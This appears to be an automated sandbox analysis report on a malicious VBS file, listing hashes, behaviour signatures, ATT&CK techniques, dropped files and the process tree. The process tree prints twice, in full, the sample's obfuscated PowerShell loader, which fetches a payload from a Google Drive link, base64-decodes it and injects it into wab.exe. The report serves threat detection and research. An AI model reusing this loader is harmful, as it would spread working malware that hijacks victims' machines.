05a2aa7be4bb637d6fd522232869d3d194769d985b886cdbf3cf87f0792f1cbc

General

Target

05a2aa7be4bb637d6fd522232869d3d194769d985b886cdbf3cf87f0792f1cbc.vbs
Size

1.1MB
MD5

57a36968f0c63c5a762009b942b97815
SHA1

af02b89ba1d662e9c5623e44d65a1fa62820acea
SHA256

05a2aa7be4bb637d6fd522232869d3d194769d985b886cdbf3cf87f0792f1cbc
SHA512

50f4b31a8f3c07357808d0c73e2e21321fbb9cb0e7fd9098bbeb0012c96abb9ee4998bafec78ac209971dda3b40262af04874cf99f2f5c5f670205109a7f691b
SSDEEP

12288:X31cvBzbU01qal638iNX3iTMgmuYtWN/ZgMiQPeRjcY:XYz64+2SjcY

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
5	952	powershell.exe
7	952	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
4	drive.google.com
5	drive.google.com
9	drive.google.com

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
1520	powershell.exe
2564	wab.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1520 set thread context of 2564	1520	powershell.exe	34

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
952	powershell.exe
1520	powershell.exe
1520	powershell.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
1520	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	952	powershell.exe
Token: SeDebugPrivilege	1520	powershell.exe

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 2876 wrote to memory of 952	2876	WScript.exe	28
PID 2876 wrote to memory of 952	2876	WScript.exe	28
PID 2876 wrote to memory of 952	2876	WScript.exe	28
PID 952 wrote to memory of 1192	952	powershell.exe	30
PID 952 wrote to memory of 1192	952	powershell.exe	30
PID 952 wrote to memory of 1192	952	powershell.exe	30
PID 952 wrote to memory of 1520	952	powershell.exe	32
PID 952 wrote to memory of 1520	952	powershell.exe	32
PID 952 wrote to memory of 1520	952	powershell.exe	32
PID 952 wrote to memory of 1520	952	powershell.exe	32
PID 1520 wrote to memory of 1884	1520	powershell.exe	33
PID 1520 wrote to memory of 1884	1520	powershell.exe	33
PID 1520 wrote to memory of 1884	1520	powershell.exe	33
PID 1520 wrote to memory of 1884	1520	powershell.exe	33
PID 1520 wrote to memory of 2564	1520	powershell.exe	34
PID 1520 wrote to memory of 2564	1520	powershell.exe	34
PID 1520 wrote to memory of 2564	1520	powershell.exe	34
PID 1520 wrote to memory of 2564	1520	powershell.exe	34
PID 1520 wrote to memory of 2564	1520	powershell.exe	34
PID 1520 wrote to memory of 2564	1520	powershell.exe	34

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\05a2aa7be4bb637d6fd522232869d3d194769d985b886cdbf3cf87f0792f1cbc.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2876
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Tonere = 1;Function Magnolies($Fagspecifik){$Nitritter=$Fagspecifik.Length-$Tonere;$Eksegese='Substring';For( $Udfladnings=7;$Udfladnings -lt $Nitritter;$Udfladnings+=8){$sikkerhedspolitiske+=$Fagspecifik.$Eksegese.Invoke( $Udfladnings, $Tonere);}$sikkerhedspolitiske;}function Fugtighedskremernes($Rwd){ .($Dnomiske) ($Rwd);}$Drizzled=Magnolies 'GlggensMb uffmao Afst,ez Uegenni Troubllvo.sfigltotalliaUncerem/ ditike5Clutchy.Sammenk0Antikon Indsyed( O.dinaWSubfunciSproggen.nkslibdSp ldevoHo.edfawVoldgifsHes.ebr generouN FderalTThirdne Nedste 1Linjxor0 Opensu. M ropl0Spinaen; Me,mho GuldengW Sensibi PaucilnCuspida6 En ier4sadduki;Mellems B odtrxAllevia6Cowpun 4m senro; Gl.sse Hymnle,rConsortvInkamin:Multivo1Adventi2Rota.et1 Varigh.fortrin0Karoles)Branchi fette,eG Stronte Hangi c Fo etek Admirao Sugger/,abnern2.atmake0W ngies1Hyperme0Voldeli0 Gifted1,kkener0.sblokk1Carbona RollickF Attenai afkrimrDatterse IntervflugandaoHaslevsxUndergr/R.eumat1Barmhje2 Vedvar1Baud ry..raeben0 reatmo ';$Caruage=Magnolies 'ProgramUSummaspsSnksmedeComplairLedsage-HarpiksA Opkbteg BinotyeNedvr inKulds rtFladblg ';$Outcome=Magnolies ' Telfonh.uperint LibyaitUmbellup BriefesBrooms,:Intrafu/Stnk ko/Nonconcd Electrr,utsteaiunsinkav CirculeTraa.vr.Roacheqg SaloonoPublishoCladblogAnkerkdlWithst,eHype fl. nmonascUnexpuro TyrkermUdgydel/dods.niu PlumlecSeptisk?bru erheFagkritxDiscordp B ruseoP astter.sosulptEpinast= fsknid ContraoSnoretrwfeminisnHerschvlDrikkevoIdrtsanaEtymolod .rossi&Fend asi Ost.ocd mash.k=Oraclep1Es,alata IndustV Unint,t Pahautzboxw.odMObnebulrpseudoceFarfe cFBilledraDdsikkedProglotFb,rometK Una,taSDusiner5Sk.mterDSlutspi4Sotena.2impostu0 .orali9BrysthoXDysyntrKKnsdis uStemm,pfNeoph,b4 achte.4Indtrric NvneretCondu tuEjerbolpHemapoirAquaculMBatikfaB Unn,rm ';$Ol=Magnolies ' Disper> Monark ';$Dnomiske=Magnolies 'Ro tefri Tita,oeThreefoxDi,crit ';$Surat182='Sermonizers';$Intends = Magnolies 'firdobleSmaattecInddatahSpndvido amphi Antifor%attraktaAngel epRundendpVoluti.dCascadaastjern.tHovedkaaAll rti%Calfbou\me,oranITophescnD,gdraadmalro aoAlbshutk ForskntDiskettr BaysmeiD,tpalmn Str ndeBrug.rdrJusterieAnthropd,ulphoae Lik,ids Kredit.RingridMCollimauDob,eltsVedgaae Ubevis&.abatmr&Bawdrie KogendeeSkrammecP,ngepuhBryggero Peda f Mcgra tStatist ';Fugtighedskremernes (Magnolies ' Kjensv$irvin.sg Kromchl tockhooaegeriibMer,tlea Juicefl Tr.ska: BrugtvVLeukocyeNonfloarPi,ligesSubtrouiStykvrkfConvolui fterspeM,racasr,angiumsReincur= Haandv( DioramcMetepenm XanthodAlk.ant Nitritt/NathalicKlarlgg Genski$HavfladIA,dressnSporingtSenge de a.skalnNdlgnendTop rissSiensch) Ba.low ');Fugtighedskremernes (Magnolies 'Sini is$ Befr,gg lderbrlSkatteuoTroldkrb SpildeaMudrepolSouthwe:Le geddIAbsurd nEpi iordNoncontbEm.lastrSaccus,uOpklbeod EmancisBsselbetKundegrySkridttvOctodoneStockcarHorologiLjerl.gepeniblerRevocatnUnsepuleSeafloo= Spondy$T naalsOreimkenuve ticitUncinatcLombardo,unktiom Komforevulpecu.Cir,umtsParomoepUl.kkeslStu,tisiAveragetKlippe (Udhvile$S,eboldO AarskolRupiaca)Komaern ');$Outcome=$Indbrudstyverierne[0];$Bagmur= (Magnolies ' Ks.nsd$pallahbgOmgivell No.assoAlpenstbStoreblaVaporiml Taabel:ReptilsROstedmio Fangarm FilarmaSknhedsnGen emblG,stikmyTrste p=FrastdeN Go,veteM tachrwSkikke - UrimelOAf.rogrbCat.chrjDistribe DefroscBrnelamtOgumbor TvisteSSullageyKonfitus ExocoltBroccoleBennet mMat,iar.PestereN DigesteCanostatChlorp .GlossoiW PelsbeeSocialsb LustinCMiniskilSc.ofuliUdbankeeDingwalnCroqu.et');$Bagmur+=$Versifiers[1];Fugtighedskremernes ($Bagmur);Fugtighedskremernes (Magnolies 'Forgive$generinR undhedoSuperinmTrullada SlaasknmeteyarlFunktioypaalide. CrossoHNew,angeDantedra DiacetdBedeslaeChedreurPlattess Proble[Bortfor$ GroatsC Ultrada Socio rErindriuCh rdopa At amagSvigteseAabning]Indtru.=Mislang$ Bonn.kD Fodrodr Samle,iHem.olizK nkurszMikkalalLysbehaeAgterspd Tape,s ');$Tegnstoerrelse=Magnolies 'D,ibble$MacroscR Spilt oInexpedmAutorisaPentadan cytostlThe logyNotewor. SulphaD AmatrooMon.stdw KirsefnBlanderl midsizounincluashopwe,dDisgustFOvera,tiLikeminlArvemoneAargang(Kokotte$FilterhOligati,uskistavtVekselrckont,ntoHavebrumFortrsteConvinc,Overmen$bvseneeCspeciala MyotickStubbekcAktivithFremstdiDistritkmonse geUndladel Fidibu)Toppunk ';$Cakchikel=$Versifiers[0];Fugtighedskremernes (Magnolies 'Givne,e$Traute gScrawlylWee esso DolittbFiskalea Karretl Kino,l:OpgavefHMeibomiaTre keraJaniss.rFuttogesLgenstabSympatirBardu ee SyntakdKl,ppeb= Subjug(SorelprTI.dvirkeSvined,sSparsestRegalva-Cryoge,PLude,kaa Degen.tKildeteh Hypoph Cudgel$Ha.medeCEpigramaLiquidikSvirp tcIntercehReignedi LempelkSixteeneUhensigl Overme)Pendant ');while (!$Haarsbred) {Fugtighedskremernes (Magnolies 'Hangare$tropiklgErnringlSkudstro TamonebquannetaIndkaldl Lumino:Parlam Snap thiuInstiturInduceac Lan,loiWat,rdensulfindg ,arthilVerisimeFarveri=demonic$Upp,rcatIndlggerSu ersuu Petrole Skatte ') ;Fugtighedskremernes $Tegnstoerrelse;Fugtighedskremernes (Magnolies ' KamavaSStilstatNizi ataAmtsgodrB gaaentbredba -PollinoSPeacelel R.stere TugtemeRiffenepSagnom Artless4Femal.z ');Fugtighedskremernes (Magnolies 'Y.msesi$Te tplegDiolperlKnal,eno RegnvabNullipoaResultalKatekis:MaadersHRehabila,etasseaSledginrTing,stscocainibAbsorptrC llaydeOut houdapperce=Fist ls(SkemalaTAmoebiaeChlorelsMu.tinetHattepu-Cha.acuPD,sillua SatiritVoldgifhCompl.i Airth i$ Rege,eCUniqueraFluevgtksuberizcSikk rhhGing viiGrimedjkSemitexePro opllRelatio) Unconv ') ;Fugtighedskremernes (Magnolies 'Vandmll$FeverfegFr.idhol,assivao vizoreb RntgenaBoggs il Preabu:PsychodTConsultrTorsad oRoanokelSt emesd TimokrkAhorntrlDingoerlMidwifei,rvlevenElegiergTenoplaeJodtinkrTroskabn robusieE,terresFaxers.2Genicul4tupianz5Wh.lvea=Bdeprak$ FrekvegRaketvrlSymbr.no Nonsufb DemissaSterililBaadt,p:KoreogrTHovereroUnhouser,xorhasp Snob.ee AgglomrN,rveannUbesluteFro.tbi+Branch +Wearabl%a.senil$ HjtstaI nurse,nskrmdiadSortk.nbMellemkr ,avsrauSchalbudRhabdoms OvervatVildt,oyBrnefl,vStru,teeKn,trmprBiografiTractabeToldposrP,ausibn Fanfare.riksek. ,jendocFeldspao FerineuVandelanCalycoztPrventi ') ;$Outcome=$Indbrudstyverierne[$Troldkllingernes245];}$Beredskabsplanlgningers=352180;$kartotekskortene=30653;Fugtighedskremernes (Magnolies 'Flu.elh$,oometrgTemporal Ox.aceo DifterbUnconceaOndsindlBedroo,:pa,agraULimacindSexualimDisserta Kvin etGe rgiatSammenreKristnel SocioesTeoretie DelagtsUlbertok UnpredrEkspedtiPrajapagtrailt.e RingbanisoamideRa finasUanfgte Uropfre=Sikkerh PinscheGSanseree Uncropt Harver-Skri.emCModtageoAds rptn,ntennetSpisesaeLill,punNonde utCrestle cand el$HalvmaaCSpidsvia ViverikTownhoocMa.theshFae.dstiTalehrekSlickeneMinefarlagitere ');Fugtighedskremernes (Magnolies 'Udsving$Velfrdsg ProsyllGipsplaoUlavegebStationaArthroplKendric: calcanLAnlgsakaTsotsienPeberfrg PlovfufDittanyiUnbathenvirksomgVideopleKoldstar TrucebeDressu,nTegnendsB sidde Inhoop=udstukk Cosecan[LabruscSHymenopyIndiffesMetempstOpposite NondelmLa hesf.EnjoyabCDjurslao .undsknBefle kvOysterreAfspn irImpulsstBlevetb]mucovis:Skudsma:ArbejdsF ruter,rKlassifoGrisk.smB.ygmesBPro,ellaScrewsmsTangen.eGobieso6Elufsve4InformiS Undervt loserer AutocoiUvill gn Fluep.g Mod.st(Skifref$ AfvaskUBjemuskdN jadenmTegngiva ClaymotScherzotPinagt,eFamiliel Sekun.shetero.eStrikvas AgonizkUropsilrKlbem ki St mmegSwanpareSkyttesnBotch.neNattillsAu,okra)Natheti ');Fugtighedskremernes (Magnolies ' Missio$ Ungdo gJavaneslThalas o,naskinb Scarmaa SupposlCircumg:NestoriB CenterlQuinidiiNomogranCobbleskOv.rraueNowyunerNe,traleForretnsstelern Te,kels=Kogebog Unfoil[B evsamSAlbifi,yErnitaxs Puddaatforsknie Klass mLuxesge.RigsarkTIndholdeBankfulx,nemrketVindtrr.UddeligE Trans,nha delscUntar eoKommisedFlovsesi StatusnMiljmingVedbliv] Knased:Tam one:svingarA Teok aSGartnerCFllesbeI,orebilIFedtpro.KonfirmGRay.nereNebulest MohuraSFear,outTanningrUrgeriniMetasomnnskeforgMonomor( Dorlac$ UntempLPavageza SamfunnCambrelgSchizzofNumerisi UnselfnBille,mgMachaireMalm.rsrBusse.seAny ithn Fen.gls Karbur) nation ');Fugtighedskremernes (Magnolies ' Merita$ UngermgPhloro,l Altoiso CampanbDelftsgaMaskinflS etosk:Un ungmESorbolux bankmahFillagru mythopmBervel,eSolmodndsovemed=Flkkens$FurfibrBCor ophlMetronyiBlankernChuserck Ligesae FriendrAffald eKonservsCyclamm.,ntisensTrottleuTakkernbCantraisgalaxiatProethnr OmdbniiPaxillunIsopsepgSantour( dgnrap$ Frdi,bBRandsyneFibrillrBe.eficeResolicd HeptamsSubcompk T xtroafim,riabAlfonsos isexpepFangedrlDu,hgssaRigmaronPrinterlDisten.gUngues,nSubsi.iiBrai wanRubrishg,ilhugge .onvicr Prorhis Twoeso,Stregko$UnbrighkSubstraaMonoecyrRytter.t Casimeo raflytt Un.ooteClamorokSoltimes Smaglsk SportsoUndu,anreored.atSpaadomeRepsfden MicrobeEvasive)Cloudli ');Fugtighedskremernes $Exhumed;"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:952
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Indoktrineredes.Mus && echo t"
    3⤵
    PID:1192
- - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Tonere = 1;Function Magnolies($Fagspecifik){$Nitritter=$Fagspecifik.Length-$Tonere;$Eksegese='Substring';For( $Udfladnings=7;$Udfladnings -lt $Nitritter;$Udfladnings+=8){$sikkerhedspolitiske+=$Fagspecifik.$Eksegese.Invoke( $Udfladnings, $Tonere);}$sikkerhedspolitiske;}function Fugtighedskremernes($Rwd){ .($Dnomiske) ($Rwd);}$Drizzled=Magnolies 'GlggensMb uffmao Afst,ez Uegenni Troubllvo.sfigltotalliaUncerem/ ditike5Clutchy.Sammenk0Antikon Indsyed( O.dinaWSubfunciSproggen.nkslibdSp ldevoHo.edfawVoldgifsHes.ebr generouN FderalTThirdne Nedste 1Linjxor0 Opensu. M ropl0Spinaen; Me,mho GuldengW Sensibi PaucilnCuspida6 En ier4sadduki;Mellems B odtrxAllevia6Cowpun 4m senro; Gl.sse Hymnle,rConsortvInkamin:Multivo1Adventi2Rota.et1 Varigh.fortrin0Karoles)Branchi fette,eG Stronte Hangi c Fo etek Admirao Sugger/,abnern2.atmake0W ngies1Hyperme0Voldeli0 Gifted1,kkener0.sblokk1Carbona RollickF Attenai afkrimrDatterse IntervflugandaoHaslevsxUndergr/R.eumat1Barmhje2 Vedvar1Baud ry..raeben0 reatmo ';$Caruage=Magnolies 'ProgramUSummaspsSnksmedeComplairLedsage-HarpiksA Opkbteg BinotyeNedvr inKulds rtFladblg ';$Outcome=Magnolies ' Telfonh.uperint LibyaitUmbellup BriefesBrooms,:Intrafu/Stnk ko/Nonconcd Electrr,utsteaiunsinkav CirculeTraa.vr.Roacheqg SaloonoPublishoCladblogAnkerkdlWithst,eHype fl. nmonascUnexpuro TyrkermUdgydel/dods.niu PlumlecSeptisk?bru erheFagkritxDiscordp B ruseoP astter.sosulptEpinast= fsknid ContraoSnoretrwfeminisnHerschvlDrikkevoIdrtsanaEtymolod .rossi&Fend asi Ost.ocd mash.k=Oraclep1Es,alata IndustV Unint,t Pahautzboxw.odMObnebulrpseudoceFarfe cFBilledraDdsikkedProglotFb,rometK Una,taSDusiner5Sk.mterDSlutspi4Sotena.2impostu0 .orali9BrysthoXDysyntrKKnsdis uStemm,pfNeoph,b4 achte.4Indtrric NvneretCondu tuEjerbolpHemapoirAquaculMBatikfaB Unn,rm ';$Ol=Magnolies ' Disper> Monark ';$Dnomiske=Magnolies 'Ro tefri Tita,oeThreefoxDi,crit ';$Surat182='Sermonizers';$Intends = Magnolies 'firdobleSmaattecInddatahSpndvido amphi Antifor%attraktaAngel epRundendpVoluti.dCascadaastjern.tHovedkaaAll rti%Calfbou\me,oranITophescnD,gdraadmalro aoAlbshutk ForskntDiskettr BaysmeiD,tpalmn Str ndeBrug.rdrJusterieAnthropd,ulphoae Lik,ids Kredit.RingridMCollimauDob,eltsVedgaae Ubevis&.abatmr&Bawdrie KogendeeSkrammecP,ngepuhBryggero Peda f Mcgra tStatist ';Fugtighedskremernes (Magnolies ' Kjensv$irvin.sg Kromchl tockhooaegeriibMer,tlea Juicefl Tr.ska: BrugtvVLeukocyeNonfloarPi,ligesSubtrouiStykvrkfConvolui fterspeM,racasr,angiumsReincur= Haandv( DioramcMetepenm XanthodAlk.ant Nitritt/NathalicKlarlgg Genski$HavfladIA,dressnSporingtSenge de a.skalnNdlgnendTop rissSiensch) Ba.low ');Fugtighedskremernes (Magnolies 'Sini is$ Befr,gg lderbrlSkatteuoTroldkrb SpildeaMudrepolSouthwe:Le geddIAbsurd nEpi iordNoncontbEm.lastrSaccus,uOpklbeod EmancisBsselbetKundegrySkridttvOctodoneStockcarHorologiLjerl.gepeniblerRevocatnUnsepuleSeafloo= Spondy$T naalsOreimkenuve ticitUncinatcLombardo,unktiom Komforevulpecu.Cir,umtsParomoepUl.kkeslStu,tisiAveragetKlippe (Udhvile$S,eboldO AarskolRupiaca)Komaern ');$Outcome=$Indbrudstyverierne[0];$Bagmur= (Magnolies ' Ks.nsd$pallahbgOmgivell No.assoAlpenstbStoreblaVaporiml Taabel:ReptilsROstedmio Fangarm FilarmaSknhedsnGen emblG,stikmyTrste p=FrastdeN Go,veteM tachrwSkikke - UrimelOAf.rogrbCat.chrjDistribe DefroscBrnelamtOgumbor TvisteSSullageyKonfitus ExocoltBroccoleBennet mMat,iar.PestereN DigesteCanostatChlorp .GlossoiW PelsbeeSocialsb LustinCMiniskilSc.ofuliUdbankeeDingwalnCroqu.et');$Bagmur+=$Versifiers[1];Fugtighedskremernes ($Bagmur);Fugtighedskremernes (Magnolies 'Forgive$generinR undhedoSuperinmTrullada SlaasknmeteyarlFunktioypaalide. CrossoHNew,angeDantedra DiacetdBedeslaeChedreurPlattess Proble[Bortfor$ GroatsC Ultrada Socio rErindriuCh rdopa At amagSvigteseAabning]Indtru.=Mislang$ Bonn.kD Fodrodr Samle,iHem.olizK nkurszMikkalalLysbehaeAgterspd Tape,s ');$Tegnstoerrelse=Magnolies 'D,ibble$MacroscR Spilt oInexpedmAutorisaPentadan cytostlThe logyNotewor. SulphaD AmatrooMon.stdw KirsefnBlanderl midsizounincluashopwe,dDisgustFOvera,tiLikeminlArvemoneAargang(Kokotte$FilterhOligati,uskistavtVekselrckont,ntoHavebrumFortrsteConvinc,Overmen$bvseneeCspeciala MyotickStubbekcAktivithFremstdiDistritkmonse geUndladel Fidibu)Toppunk ';$Cakchikel=$Versifiers[0];Fugtighedskremernes (Magnolies 'Givne,e$Traute gScrawlylWee esso DolittbFiskalea Karretl Kino,l:OpgavefHMeibomiaTre keraJaniss.rFuttogesLgenstabSympatirBardu ee SyntakdKl,ppeb= Subjug(SorelprTI.dvirkeSvined,sSparsestRegalva-Cryoge,PLude,kaa Degen.tKildeteh Hypoph Cudgel$Ha.medeCEpigramaLiquidikSvirp tcIntercehReignedi LempelkSixteeneUhensigl Overme)Pendant ');while (!$Haarsbred) {Fugtighedskremernes (Magnolies 'Hangare$tropiklgErnringlSkudstro TamonebquannetaIndkaldl Lumino:Parlam Snap thiuInstiturInduceac Lan,loiWat,rdensulfindg ,arthilVerisimeFarveri=demonic$Upp,rcatIndlggerSu ersuu Petrole Skatte ') ;Fugtighedskremernes $Tegnstoerrelse;Fugtighedskremernes (Magnolies ' KamavaSStilstatNizi ataAmtsgodrB gaaentbredba -PollinoSPeacelel R.stere TugtemeRiffenepSagnom Artless4Femal.z ');Fugtighedskremernes (Magnolies 'Y.msesi$Te tplegDiolperlKnal,eno RegnvabNullipoaResultalKatekis:MaadersHRehabila,etasseaSledginrTing,stscocainibAbsorptrC llaydeOut houdapperce=Fist ls(SkemalaTAmoebiaeChlorelsMu.tinetHattepu-Cha.acuPD,sillua SatiritVoldgifhCompl.i Airth i$ Rege,eCUniqueraFluevgtksuberizcSikk rhhGing viiGrimedjkSemitexePro opllRelatio) Unconv ') ;Fugtighedskremernes (Magnolies 'Vandmll$FeverfegFr.idhol,assivao vizoreb RntgenaBoggs il Preabu:PsychodTConsultrTorsad oRoanokelSt emesd TimokrkAhorntrlDingoerlMidwifei,rvlevenElegiergTenoplaeJodtinkrTroskabn robusieE,terresFaxers.2Genicul4tupianz5Wh.lvea=Bdeprak$ FrekvegRaketvrlSymbr.no Nonsufb DemissaSterililBaadt,p:KoreogrTHovereroUnhouser,xorhasp Snob.ee AgglomrN,rveannUbesluteFro.tbi+Branch +Wearabl%a.senil$ HjtstaI nurse,nskrmdiadSortk.nbMellemkr ,avsrauSchalbudRhabdoms OvervatVildt,oyBrnefl,vStru,teeKn,trmprBiografiTractabeToldposrP,ausibn Fanfare.riksek. ,jendocFeldspao FerineuVandelanCalycoztPrventi ') ;$Outcome=$Indbrudstyverierne[$Troldkllingernes245];}$Beredskabsplanlgningers=352180;$kartotekskortene=30653;Fugtighedskremernes (Magnolies 'Flu.elh$,oometrgTemporal Ox.aceo DifterbUnconceaOndsindlBedroo,:pa,agraULimacindSexualimDisserta Kvin etGe rgiatSammenreKristnel SocioesTeoretie DelagtsUlbertok UnpredrEkspedtiPrajapagtrailt.e RingbanisoamideRa finasUanfgte Uropfre=Sikkerh PinscheGSanseree Uncropt Harver-Skri.emCModtageoAds rptn,ntennetSpisesaeLill,punNonde utCrestle cand el$HalvmaaCSpidsvia ViverikTownhoocMa.theshFae.dstiTalehrekSlickeneMinefarlagitere ');Fugtighedskremernes (Magnolies 'Udsving$Velfrdsg ProsyllGipsplaoUlavegebStationaArthroplKendric: calcanLAnlgsakaTsotsienPeberfrg PlovfufDittanyiUnbathenvirksomgVideopleKoldstar TrucebeDressu,nTegnendsB sidde Inhoop=udstukk Cosecan[LabruscSHymenopyIndiffesMetempstOpposite NondelmLa hesf.EnjoyabCDjurslao .undsknBefle kvOysterreAfspn irImpulsstBlevetb]mucovis:Skudsma:ArbejdsF ruter,rKlassifoGrisk.smB.ygmesBPro,ellaScrewsmsTangen.eGobieso6Elufsve4InformiS Undervt loserer AutocoiUvill gn Fluep.g Mod.st(Skifref$ AfvaskUBjemuskdN jadenmTegngiva ClaymotScherzotPinagt,eFamiliel Sekun.shetero.eStrikvas AgonizkUropsilrKlbem ki St mmegSwanpareSkyttesnBotch.neNattillsAu,okra)Natheti ');Fugtighedskremernes (Magnolies ' Missio$ Ungdo gJavaneslThalas o,naskinb Scarmaa SupposlCircumg:NestoriB CenterlQuinidiiNomogranCobbleskOv.rraueNowyunerNe,traleForretnsstelern Te,kels=Kogebog Unfoil[B evsamSAlbifi,yErnitaxs Puddaatforsknie Klass mLuxesge.RigsarkTIndholdeBankfulx,nemrketVindtrr.UddeligE Trans,nha delscUntar eoKommisedFlovsesi StatusnMiljmingVedbliv] Knased:Tam one:svingarA Teok aSGartnerCFllesbeI,orebilIFedtpro.KonfirmGRay.nereNebulest MohuraSFear,outTanningrUrgeriniMetasomnnskeforgMonomor( Dorlac$ UntempLPavageza SamfunnCambrelgSchizzofNumerisi UnselfnBille,mgMachaireMalm.rsrBusse.seAny ithn Fen.gls Karbur) nation ');Fugtighedskremernes (Magnolies ' Merita$ UngermgPhloro,l Altoiso CampanbDelftsgaMaskinflS etosk:Un ungmESorbolux bankmahFillagru mythopmBervel,eSolmodndsovemed=Flkkens$FurfibrBCor ophlMetronyiBlankernChuserck Ligesae FriendrAffald eKonservsCyclamm.,ntisensTrottleuTakkernbCantraisgalaxiatProethnr OmdbniiPaxillunIsopsepgSantour( dgnrap$ Frdi,bBRandsyneFibrillrBe.eficeResolicd HeptamsSubcompk T xtroafim,riabAlfonsos isexpepFangedrlDu,hgssaRigmaronPrinterlDisten.gUngues,nSubsi.iiBrai wanRubrishg,ilhugge .onvicr Prorhis Twoeso,Stregko$UnbrighkSubstraaMonoecyrRytter.t Casimeo raflytt Un.ooteClamorokSoltimes Smaglsk SportsoUndu,anreored.atSpaadomeRepsfden MicrobeEvasive)Cloudli ');Fugtighedskremernes $Exhumed;"
    3⤵
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1520
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Indoktrineredes.Mus && echo t"
      4⤵
      PID:1884
  - - C:\Program Files (x86)\windows mail\wab.exe
      "C:\Program Files (x86)\windows mail\wab.exe"
      4⤵
      Suspicious use of NtSetInformationThreadHideFromDebugger
      PID:2564

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Wrongdoing148.txt

Filesize
533B

MD5
c4fd6dd4674adeda7bb178482632e062

SHA1
f43851b9b5209eafa2896a4fa449af93f5c186e4

SHA256
c256b6b19c2b844f6b0354905a8f8a88c686a2addff795525ac0484ee92a8e88

SHA512
cd992def59025e60f77c14d781163d5267368d859152e785c7dc6c8d4a5af376acafa7d9d20a7d9d04e4343b99f143a8c9896d26862f4f45b93432536cb7d06d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Wrongdoing148.txt

Filesize
3KB

MD5
e35659d1ed6a7ec4e8ada0759d040ff3

SHA1
b321720510b5909772679425235c465b5d0a7673

SHA256
16befbb06d9e78a39d4449270fbe60b2c08fb7190202c099aa41c8b8f1b0091a

SHA512
60b7c145f9616435c1fe1decfc40ba67875043b632e626ff203fa8c46d9094f2bf1db7bddc84a5e92fd6b3fbd2fc4c748589f642152357f38501f0c1ddc65201

Download Submit
C:\Users\Admin\AppData\Local\Temp\Wrongdoing148.txt

Filesize
3KB

MD5
fec8faa82a7817821b3fd8efc7f09883

SHA1
82c4e4e2cf7bd7157a57b9aa95f4abcc99f050b3

SHA256
885248db700dc5ae4434809d7323f5109442addb1f16fde4b8853c2789e64a4a

SHA512
05ed3e584b339c406e01f7d0c7c8f738aa1162b068bbe86ba747331d5d7c61106f3ed861f5ee8831f0680d4faf08ab4ce30e70a0212c0187e8b49f745f351a40

Download Submit
C:\Users\Admin\AppData\Local\Temp\Wrongdoing148.txt

Filesize
4KB

MD5
750f45ddc94a66568f63c25214f196be

SHA1
ad1fc4320ea6c812568d9801f335c17daae0fd9f

SHA256
f0cec9ffdf3b82b3e297d9ab83eed23f8d7cf2b60d8c296b7bfc96152e8485a0

SHA512
0913115a6e11ed09fa6cbe0901bb5f7e05cbbee7bef2f05c8895e3f1720f9b2b4ae24d78a3f677ff28e9cf8700513374d9fad73ee053644eccb3c2666438d2fa

Download Submit
C:\Users\Admin\AppData\Local\Temp\Wrongdoing148.txt

Filesize
2KB

MD5
7ce7fcb94a4fe53d7b92cc32040677dd

SHA1
4521740077efa9591391589f0027a0c11c35a2f3

SHA256
15490ab786390eadd39c99f8ddc8fa725b5bc8a1b47a872866ecaf6e22953ac4

SHA512
41b2a9b60ee3ec3fe32e0896bbe1dd474e57fa25abe485777ad97b204c74d180cf8220078933756fdd7cfd7cbab1cf4e7baeaf3ca079946f0ecf41354d2edd6e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Wrongdoing148.txt

Filesize
117B

MD5
48bddcd7115f722eb41287e840943c5a

SHA1
c214178e6cce73e427c64ab5c3e8d51d87d51781

SHA256
40fd86ca7ae8a6eb12d3baff8ca481bece309ce82f90df7bc55d18c41ac8f421

SHA512
fc53b221a3b0fb77547782d1b88b98e3f9ce3dfaf917d54db656afbc89766adfecd410c3f74dfb0be570e0280025fc88a0acd363e5a7d7e63fd662a3a53f731d

Download Submit
C:\Users\Admin\AppData\Roaming\Indoktrineredes.Mus

Filesize
498KB

MD5
fd2c79126794571bff2e747342a7a2c6

SHA1
6f2553e82f2833f74986db99150717a3a6a541c4

SHA256
77e4915258d44a56ace953e92a8cfac4e6fa73976f8726c6c0af337c734dc290

SHA512
9d16f00f51971eb65510ce19cb8195da44ac51040632b061750657bcc3e2872431a869ff1af5dfe79d44d3447d6719f093739251ca0bd66613a81f860efe80eb

Download Submit
